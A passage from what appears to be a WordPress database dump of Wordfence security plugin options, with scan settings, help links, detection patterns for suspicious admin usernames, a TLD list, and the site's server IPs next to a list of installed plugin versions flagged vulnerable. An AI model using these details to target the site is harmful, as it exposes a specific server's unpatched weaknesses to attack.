','1','yes'),('scansEnabled_themes','0','yes'),('scansEnabled_wafStatus','1','yes'),('scansEnabled_wpscan_directoryListingEnabled','1','yes'),('scansEnabled_wpscan_fullPathDisclosure','1','yes'),('scanStageStatuses','a:11:{s:13:\"spamvertising\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:4:\"spam\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:9:\"blacklist\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:6:\"server\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:5;s:8:\"finished\";i:5;s:8:\"expected\";i:5;}s:7:\"changes\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:6:\"public\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:7:\"malware\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:7:\"content\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:3;s:8:\"finished\";i:3;s:8:\"expected\";i:3;}s:8:\"password\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:13:\"vulnerability\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:7:\"options\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}}','no'),('scanTime','1675160552.8637','yes'),('scanType','standard','yes'),('scan_exclude','','yes'),('scan_include_extra','','yes'),('scan_maxDuration','','yes'),('scan_maxIssues','1000','yes'),('schedMode','auto','yes'),('schedStartHour','15','yes'),('scheduledScansEnabled','1','yes'),('serverDNS','1675169197;300;51.195.195.160','yes'),('serverIP','1675048482;51.77.116.174','yes'),('showAdminBarMenu','1','yes'),('showWfCentralUI','1','yes'),('signatureUpdateTime','1674668880','yes'),('spamvertizeCheck','1','yes'),('ssl_verify','1','yes'),('startScansRemotely','0','yes'),('supportContent','{\"top\":[{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":0},{\"title\":\"Optimizing The Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":1},{\"title\":\"Wordfence Web Application Firewall (WAF)\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"order\":2},{\"title\":\"Scan Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3},{\"title\":\"Wordfence and LiteSpeed\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/litespeed\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Firewall Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":6},{\"title\":\"Scan Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":7},{\"title\":\"I am locked out of my site\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/#i-am-locked-out-of-my-site\",\"order\":8},{\"title\":\"PHP Fatal error: Failed opening required wordfence-waf.php\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/#php-fatal-error-failed-opening-required-wordfence-waf-php\",\"order\":9}],\"all\":[{\"title\":\"Wordfence Free\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-free\\/\",\"excerpt\":\"Wordfence Free is an all-in-one security solution for WordPress websites that includes an endpoint firewall, security scanner, login security, alerts, centralized management, and more.\",\"order\":0},{\"title\":\"Wordfence Premium\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-premium\\/\",\"excerpt\":\"Wordfence Premium comes with real-time firewall protection, real-time scan signatures, an IP address blocklist, country blocking, and Premium support.\",\"order\":1},{\"title\":\"Wordfence Care\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-care\\/\",\"excerpt\":\"Wordfence Care is for business owners who place a premium on their time. Our team installs, configures, optimizes, and maintains your WordPress site security.\",\"order\":2},{\"title\":\"Wordfence Response\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-response\\/\",\"excerpt\":\"Wordfence Response is for mission-critical WordPress websites that require 24\\/7\\/365 security monitoring with a 1-hour response time and 24-hour remediation.\",\"order\":3},{\"title\":\"Incident Response Services\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/incident-response-services\\/\",\"excerpt\":\"Let one of our Security Analysts help you clean your infected site or inspect it for vulnerabilities.\",\"order\":4},{\"title\":\"License Key\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/api-key\\/\",\"excerpt\":\"All Wordfence installations need a license key, also known as an API-key. The key can be a free key or a Premium key. \",\"order\":5},{\"title\":\"Account and Billing History\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/account\\/\",\"excerpt\":\"How to navigate and use your Wordfence account.\",\"order\":6},{\"title\":\"Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/\",\"excerpt\":\"Wordfence Central provides a powerful and efficient way to manage the security of many WordPress sites via a single interface.\",\"children\":[{\"title\":\"Connecting your sites to Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/connect\\/\",\"order\":0},{\"title\":\"Setting up two-factor authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/2fa\\/\",\"order\":1},{\"title\":\"Using the Dashboard page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/central\\/\",\"order\":2},{\"title\":\"Using the Configuration page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/configuration\\/\",\"order\":3},{\"title\":\"Using Wordfence plugin options Templates\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/templates\\/\",\"order\":4},{\"title\":\"Using the Settings page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/settings\\/\",\"order\":5},{\"title\":\"Using Wordfence Central Teams\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/teams\\/\",\"order\":6},{\"title\":\"Viewing scan Findings\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/findings\\/\",\"order\":7}],\"order\":7},{\"title\":\"Dashboard\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/\",\"excerpt\":\"The Wordfence Dashboard provides insight into the current state of your site’s security.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/options\\/\",\"order\":0},{\"title\":\"Alerts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/alerts\\/\",\"order\":1}],\"order\":8},{\"title\":\"Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"excerpt\":\"The Wordfence Web Application Firewall is a PHP based, application level firewall that filters out malicious requests to your site. \",\"children\":[{\"title\":\"Optimizing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":0},{\"title\":\"Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":1},{\"title\":\"Statistics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/statistics\\/\",\"order\":2},{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/options\\/\",\"order\":3},{\"title\":\"MySQLi storage engine\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/mysqli-storage-engine\\/\",\"order\":4},{\"title\":\"Brute Force Protection\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/brute-force\\/\",\"order\":5},{\"title\":\"Rate Limiting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/rate-limiting\\/\",\"order\":6},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/troubleshooting\\/\",\"order\":7}],\"order\":9},{\"title\":\"Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/\",\"excerpt\":\"Aside from the firewall rules that protect against various attacks, Wordfence also has custom features for additional blocking. \",\"children\":[{\"title\":\"Country Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/country-blocking\\/\",\"order\":0},{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":1}],\"order\":10},{\"title\":\"Scan\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/\",\"excerpt\":\"A Wordfence scan examines all files on your WordPress website looking for malicious code, backdoors, and shells that hackers have installed. It also scans for known malicious URLs and known patterns of infections.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/options\\/\",\"order\":0},{\"title\":\"Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":1},{\"title\":\"Scheduling\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scheduling\\/\",\"order\":2},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3}],\"order\":11},{\"title\":\"Tools\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/\",\"excerpt\":\"Wordfence Tools include Live Traffic analysis, WHOIS Lookup, Import\\/Export Options, and Diagnostics.\",\"children\":[{\"title\":\"Live Traffic\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/live-traffic\\/\",\"order\":0},{\"title\":\"WHOIS Lookup\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/whois-lookup\\/\",\"order\":1},{\"title\":\"Import\\/Export\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/import-export\\/\",\"order\":2},{\"title\":\"Diagnostics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/diagnostics\\/\",\"order\":3},{\"title\":\"Legacy Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/legacy-two-factor-authentication\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5}],\"order\":12},{\"title\":\"Login Security\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security\\/\",\"excerpt\":\"The Login Security page currently contains settings for two-factor authentication (2FA) and reCAPTCHA. In a future Wordfence version, existing login-related features will also move to the same page.\",\"order\":13},{\"title\":\"Advanced\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/\",\"excerpt\":\"If you want to know more about the technical details of Wordfence, you will find the answers in this section.\",\"children\":[{\"title\":\"System requirements\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/\",\"order\":0},{\"title\":\"Changelog\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/changelog\\/\",\"order\":1},{\"title\":\"Remove or Reset\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/remove-or-reset\\/\",\"order\":2},{\"title\":\"Technical Details\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/technical-details\\/\",\"order\":3},{\"title\":\"Constants\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/constants\\/\",\"order\":4},{\"title\":\"Wordfence API\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/wordfence-api\\/\",\"order\":5},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/troubleshooting\\/\",\"order\":6},{\"title\":\"Plugin \\/ Theme Conflicts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/plugin-theme-conflicts\\/\",\"order\":7}],\"order\":14},{\"title\":\"Wordfence and GDPR - General Data Protection Regulation\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/\",\"excerpt\":\"Defiant, the company behind Wordfence, has updated its terms of use, privacy policies and software, as well as made available standard contractual clauses to meet GDPR compliance. Customers must review and agree to updated terms in order to continue using our products and services.\",\"children\":[{\"title\":\"Sub-Processors List\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/sub-processors-list\\/\",\"order\":0}],\"order\":15},{\"title\":\"Login Security Plugin\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security-plugin\\/\",\"excerpt\":\"The Wordfence Login Security plugin contains a subset of the features found in the full Wordfence plugin: Two-factor Authentication, XML-RPC Protection and Login Page CAPTCHA. It is ideal for sites that need login security functionality but either can’t or don’t want to run the full Wordfence plugin.\",\"order\":16}]}','yes'),('supportHash','b9a5e3270c767a1d17907b99082ec09327dc3822964570eacae8033d846446d4','yes'),('suspiciousAdminUsernames','a:2:{i:0;s:46:\"/^wp\\.service\\.controller(?:\\.[a-zA-Z0-9]+)$/i\";i:1;s:55:\"/^(?:wordpressssadmin|wordprestadmin|jaime.besser56)$/i\";}','yes'),('timeoffset_wf','0','yes'),('timeoffset_wf_updated','1675160545','yes'),('tldlist','|com|org|net|edu|aaa|abb|abc|aco|ads|aeg|afl|aig|anz|aol|app|art|aws|axa|bar|bbc|bbt|bcg|bcn|bet|bid|bio|biz|bms|bmw|bom|boo|bot|box|buy|bzh|cab|cal|cam|car|cat|cba|cbn|cbs|ceo|cfa|cfd|cpa|crs|dad|day|dds|dev|dhl|diy|dnp|dog|dot|dtv|dvr|eat|eco|esq|eus|fan|fit|fly|foo|fox|frl|ftr|fun|fyi|gal|gap|gay|gdn|gea|gle|gmo|gmx|goo|gop|got|gov|hbo|hiv|hkt|hot|how|ibm|ice|icu|ifm|inc|ing|ink|int|ist|itv|jcb|jio|jll|jmp|jnj|jot|joy|kfh|kia|kim|kpn|krd|lat|law|lds|llc|llp|lol|lpl|ltd|man|map|mba|med|men|mil|mit|mlb|mls|mma|moe|moi|mom|mov|msd|mtn|mtr|nab|nba|nec|new|nfl|ngo|nhk|now|nra|nrw|ntt|nyc|obi|one|ong|onl|ooo|ott|ovh|pay|pet|phd|pid|pin|pnc|pro|pru|pub|pwc|red|ren|ril|rio|rip|run|rwe|sap|sas|sbi|sbs|sca|scb|sew|sex|sfr|ski|sky|soy|spa|srl|stc|tab|tax|tci|tdk|tel|thd|tjx|top|trv|tui|tvs|ubs|uno|uol|ups|vet|vig|vin|vip|wed|win|wme|wow|wtc|wtf|xin|xxx|xyz|you|yun|zip|ac|ad|ae|af|ag|ai|al|am|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cu|cv|cw|cx|cy|cz|de|dj|dk|dm|do|dz|ec|ee|eg|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|me|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|rs|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr|ss|st|su|sv|sx|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tr|tt|tv|tw|tz|ua|ug|uk|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|za|zm|zw|aarp|able|aero|akdn|ally|amex|arab|army|arpa|arte|asda|asia|audi|auto|baby|band|bank|bbva|beer|best|bike|bing|blog|blue|boats|boehringer|bofa|book|buzz|cafe|bnpparibas|bond|bradesco|call|camp|case|canon|casa|cash|boston|cars|bostik|care|cbre|cern|citi|city|coop|cards|cool|bosch|club|booking|build|chat|crown|cymru|cyou|boutique|coach|dclk|fast|cloud|deal|cisco|citic|codes|dell|erni|fiat|fido|film|fire|food|ford|dabur|dvag|flir|dance|diet|dish|docs|fans|farm|fish|blockbuster|data|date|desi|fage|fail|deals|free|cheap|fund|game|itau|java|jeep|jobs|jprs|kddi|kids|kiwi|kpmg|kred|land|lego|life|like|limo|link|live|delta|love|ltda|luxe|room|bloomberg|loan|rsvp|ruhr|safe|chase|sale|sarl|save|saxo|scot|seat|seek|sexy|shaw|shia|shop|show|silk|sina|site|skin|sncf|sohu|games|bridgestone|caravan|career|gbiz|careers|casino|gent|ggee|gift|catering|catholic|center|chanel|channel|gmbh|charity|gold|chintai|guge|hair|haus|chrome|church|guru|circle|claims|citadel|cityeats|golf|cipriani|cleaning|christmas|goog|broadway|hdfc|help|here|hgtv|host|hsbc|info|brussels|icbc|ieee|lgbt|garden|imdb|immo|lidl|brother|nico|nike|reit|lipsy|broker|lilly|read|rent|rest|linde|loans|rich|locus|ollo|qpon|lotte|builders|business|capital|capetown|capitalone|open|page|pars|pccw|pohl|post|prod|prof|camera|pics|lotto|calvinklein|ping|pink|play|plus|porn|song|vote|accountant|voto|wang|weir|wien|wiki|wine|academy|accenture|work|accountants|xbox|actor|abogado|yoga|abudhabi|adult|aetna|apple|airtel|archi|abbott|amfam|amica|abarth|apartments|audio|abbvie|agency|anquan|author|aquarelle|aramco|autos|africa|azure|baidu|bingo|airbus|alstom|alfaromeo|alibaba|alipay|allfinanz|allstate|green|alsace|zone|amazon|bible|gallo|gripe|gucci|guide|airforce|amsterdam|black|analytics|group|android|bayern|agakhan|globo|zara|athleta|gifts|gives|bauhaus|beats|beauty|glass|zero|bharti|bentley|attorney|banamex|baseball|associates|auction|audible|auspost|bestbuy|basketball|forex|gmail|avianca|barclays|barefoot|bargains|barclaycard|forum|berlin|barcelona|blackfriday|click|talk|team|bananarepublic|star|surf|drive|spot|dubai|earth|sony|clinic|edeka|email|epson|jetzt|koeln|kyoto|lamer|lease|legal|taxi|tech|viva|house|vana|visa|americanexpress|faith|americanfamily|fedex|final|homes|honda|horse|hyatt|lexus|teva|tiaa|tube|ikano|tips|town|toys|irish|vivo|macys|clinique|coupons|sharp|shell|shoes|skype|sling|smart|smile|solar|space|corsica|country|nexus|coupon|sport|courses|stada|store|study|style|comsec|cooking|sucks|swiss|contact|tatar|tires|tirol|tmall|today|credit|cricket|tokyo|tools|toray|total|tours|trade|trust|tunes|tushu|ubank|vegas|video|vodka|condos|volvo|coffee|wales|cruise|dating|dealer|dental|clubmed|datsun|degree|design|cruises|doctor|dunlop|dupont|durban|college|cologne|comcast|direct|emerck|energy|dentist|digital|engineer|express|fashion|ferrero|directory|ferrari|world|domains|discount|download|farmers|discover|family|xerox|ericsson|works|education|equipment|yahoo|engineering|enterprises|estate|etisalat|extraspace|fidelity|eurovision|events|exchange|expert|exposed|feedback|fairwinds|flickr|fishing|flights|frontdoor|giving|fitness|frogans|global|gratis|hangout|health|hermes|hockey|hotels|insure|intuit|jaguar|joburg|kaufen|grocery|juegos|stream|studio|supply|suzuki|swatch|sydney|taipei|frontier|gallup|google|hotmail|hughes|fujitsu|watch|futbol|gallery|shouji|helsinki|lancia|guardian|guitars|furniture|hamburg|kosher|genting|george|hdfcbank|healthcare|imamat|kinder|kindle|soccer|social|weber|weibo|hiphop|taobao|target|toyota|travel|zappos|company|compare|tkmaxx|voting|finance|unicom|voyage|webcam|florist|flowers|hitachi|goodyear|foodnetwork|vuelos|football|forsale|godaddy|goldpoint|grainger|graphics|fresenius|holdings|holiday|viajes|viking|walter|hoteles|tennis|firestone|hosting|firmdale|homesense|hyundai|hospital|financial|homedepot|homegoods|tattoo|hisamitsu|infiniti|villas|institute|ipiranga|insurance|tienda|virgin|yachts|international|vision|yandex|foundation|immobilien|xihuan|industries|tjmaxx|investments|ismaili|latino|meme|mini|computer|community|contractors|meet|creditcard|media|commbank|creditunion|maif|menu|mint|mobi|moda|moto|cuisinella|miami|jewelry|markets|merckmsd|marketing|money|mattel|clothing|istanbul|memorial|mobile|marriott|marshalls|maserati|mitsubishi|monash|mckinsey|monster|microsoft|mormon|mortgage|moscow|melbourne|motorcycles|movie|construction|consulting|mango|museum|music|mutual|nagoya|name|market|navy|news|next|norton|network|neustar|nextdirect|nikon|ninja|nissan|nissay|netbank|netflix|nokia|northwesternmutual|nowtv|natura|nowruz|online|cookingchannel|latrobe|observer|office|okinawa|olayan|olayangroup|oldnavy|omega|oracle|orange|organic|origins|osaka|phone|poker|living|paris|parts|party|lefrak|quest|radio|democrat|juniper|photo|limited|kerryhotels|kerrylogistics|pizza|promo|jpmorgan|place|praxi|press|prime|kerryproperties|lawyer|lincoln|locker|diamonds|makeup|lasalle|london|madrid|lacaixa|lanxess|maison|lamborghini|lighting|kuokgroup|sener|luxury|landrover|lplfinancial|otsuka|seven|lancaster|pfizer|kitchen|komatsu|management|partners|lifestyle|panasonic|passagens|photos|photography|physio|philips|pictet|sanofi|schule|plumbing|playstation|quebec|racing|search|leclerc|school|secure|pioneer|politie|pictures|lifeinsurance|pharmacy|select|realtor|recipes|repair|redstone|rehab|reise|reisen|reliance|richardli|ricoh|rodeo|realty|rocks|rentals|rugby|report|rocher|ryukyu|restaurant|review|rogers|rexroth|safety|sakura|salon|reviews|samsung|sandvik|schmidt|schwarz|schaeffler|science|security|services|shiksha|shopping|showtime|singles|software|staples|solutions|republican|softbank|storage|lundbeck|theater|zuerich|properties|systems|temasek|xfinity|deloitte|theatre|delivery|property|saarland|samsclub|stcgroup|ventures|verisign|xn--90ae|xn--node|statebank|vanguard|xn--p1ai|yamaxun|xn--qxam|pramerica|statefarm|realestate|shangrila|yokohama|stockholm|support|surgery|tickets|tiffany|toshiba|trading|walmart|wanggou|tatamotors|watches|technology|weather|supplies|university|youtube|training|travelers|woodside|vacations|vlaanderen|website|wedding|whoswho|windows|winners|xn--d1alf|xn--e1a4c|xn--90a3ac|xn--c1avg|protection|xn--90ais|xn--9dbq2a|xn--fhbei|xn--9et52u|xn--j1aef|xn--j1amh|xn--l1acc|xn--c2br7g|xn--cg4bki|xn--ngbrx|xn--nqv7f|xn--30rr7y|xn--80aswg|xn--p1acf|volkswagen|xn--qxa6a|xn--55qx5d|xn--5tzm5g|xn--tckwe|xn--vhquv|prudential|xn--3pxu8k|xn--45q11c|xn--czrs0t|yodobashi|xn--4gbrim|xn--czru2d|productions|progressive|redumbrella|williamhill|xn--11b4c3d|xn--1ck2e1b|xn--1qqw23a|xn--2scrj9c|xn--mxtq1m|xn--y9a3aq|xn--3bst00m|xn--wgbl6a|xn--3ds443g|xn--o3cw4h|xn--pssy2u|xn--q7ce6a|xn--unup4y|xn--wgbh1c|xn--3hcrj9c|xn--42c2d9a|xn--3e0b707e|xn--54b7fta0cc|sandvikcoromant|xn--45brj9c|versicherung|wolterskluwer|travelersinsurance|xn--55qw42g|travelchannel|weatherchannel|xn--9krt00a|scholarships|xn--45br5cyl|xn--5su34j936bgsg|xn--6frz82g|xn--4dbrk0ce|xn--6qq986b3xl|xn--80adxhks|xn--80ao21a|xn--cck2b3b|xn--80aqecdr1a|xn--80asehdb|xn--clchc0ea0b2g2a9gcd|xn--czr694b|xn--fiq64b|xn--fiqs8s|xn--fiqz9s|xn--fjq720a|xn--flw351e|xn--h2brj9c|xn--imr513n|xn--io0a7i|xn--d1acj3b|xn--kpry57d|xn--kput3i|xn--efvy88h|xn--fct429k|xn--g2xx48c|xn--hxt814e|xn--jvr189m|xn--kprw13d|xn--nyqy26a|xn--pgbs0dh|xn--q9jyb4c|xn--b4w605ferd|xn--otu796d|xn--rhqv96g|xn--rovu88b|xn--gckr3f0f|xn--fpcrj9c3d|xn--fzc2c9e2c|xn--gecrj9c|xn--gk3at1e|xn--cckwcxetd|xn--eckvdtc9d|xn--mgbbh1a|xn--bck1b9a5dre4c|xn--fiq228c5hs|xn--h2breg3eve|xn--mgbtx2b|xn--h2brj9c8c|xn--mix891f|xn--fzys8d69uvgm|xn--j6w193g|xn--i1b6b1a6a2e|xn--mgbaakc7dvf|xn--s9brj9c|xn--mgbaam7a8h|xn--zfr164b|xn--8y0a063a|xn--mgb9awbf|xn--mgbab2bd|xn--mgba3a3ejt|xn--kcrx77d1x4a|xn--mgbgu82a|xn--mgbpl2fh|xn--mgbi4ecexp|xn--mgbt3dhd|xn--mgbca7dzdo|xn--mgbx4cd0ab|xn--mk1bu44c|xn--ngbe9e0a|xn--jlq480n2rg|xn--mgbayh7gpa|xn--mgbbh1a71e|xn--ses554g|xn--lgbbat1ad8j|xn--ngbc5azd|xn--t60b56a|xn--vuq861b|xn--mgbah1a3hjkrd|xn--mgbai9azgqp6j|xn--mgbc0a9azcg|xn--mgbcpq6gpa1a|xn--mgberp4a5d4ar|xn--ogbpf8fl|xn--nqv7fs00ema|xn--qcka1pmc|xn--w4r85el8fhu5dnra|xn--w4rs40l|xn--mgba3a4f16a|xn--mgba7c0bbn0a|xn--vermgensberater-ctb|xn--vermgensberatung-pwb|xn--xhq521b|xn--tiq49xqyj|xn--rvc1e0am3e|xn--xkc2al3hye2a|xn--xkc2dl3a5ee0h|xn--yfro4i67o|xn--ygbi2ammx|','yes'),('tldlistHash','981d1427d47efe5bc083fd2318c2bca85172debf5fb2c673faacebc7e1d43643','yes'),('total503s','2011','yes'),('totalAlertsSent','10','yes'),('totalIPsBlocked','2012','yes'),('totalIPsLocked','4','yes'),('totalLoginHits','10338','yes'),('totalLogins','3','yes'),('totalScansRun','427','yes'),('touppBypassNextCheck','0','yes'),('touppPromptNeeded','','yes'),('vulnerabilities_plugin','a:10:{i:0;a:5:{s:4:\"slug\";s:35:\"all-in-one-wp-security-and-firewall\";s:9:\"toVersion\";s:5:\"5.1.4\";s:11:\"fromVersion\";s:6:\"4.4.11\";s:10:\"vulnerable\";b:1;s:4:\"link\";s:94:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/ce340b88-cbab-4ba8-93ae-8790f2348456\";}i:1;a:5:{s:4:\"slug\";s:17:\"disable-gutenberg\";s:9:\"toVersion\";s:5:\"2.8.1\";s:11:\"fromVersion\";s:3:\"2.6\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:2;a:5:{s:4:\"slug\";s:26:\"insert-headers-and-footers\";s:9:\"toVersion\";s:5:\"2.0.6\";s:11:\"fromVersion\";s:5:\"1.6.0\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:3;a:5:{s:4:\"slug\";s:11:\"redirection\";s:9:\"toVersion\";s:5:\"5.3.9\";s:11:\"fromVersion\";s:5:\"5.2.3\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:4;a:5:{s:4:\"slug\";s:10:\"wp-smushit\";s:9:\"toVersion\";s:6:\"3.12.4\";s:11:\"fromVersion\";s:5:\"3.9.5\";s:10:\"vulnerable\";b:1;s:4:\"link\";s:94:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/64b22728-cb07-48be-94b7-1089156490cd\";}i:5;a:5:{s:4:\"slug\";s:9:\"wordfence\";s:9:\"toVersion\";s:5:\"7.8.2\";s:11:\"fromVersion\";s:5:\"7.5.9\";s:10:\"vulnerable\";b:1;s:4:\"link\";s:94:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/833eb481-4fb4-432e-8e93-3f497ccbf1eb\";}i:6;a:5:{s:4:\"slug\";s:16:\"wp-fastest-cache\";s:9:\"toVersion\";s:5:\"1.1.0\";s:11:\"fromVersion\";s:5:\"1.0.0\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:7;a:5:{s:4:\"slug\";s:13:\"wordpress-seo\";s:9:\"toVersion\";s:4:\"20.0\";s:11:\"fromVersion\";s:6:\"18.5.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:8;a:4:{s:4:\"slug\";s:11:\"hello-dolly\";s:11:\"fromVersion\";s:5:\"1.7.2\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:9;a:4:{s:4:\"slug\";s:9:\"wp-cerber\";s:11:\"fromVersion\";s:5:\"8.9.6\";s:10:\"vulnerable\";b:1;s:4:\"link\";s:94:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/081a5fda-abe2-4f20-bea2-3f7d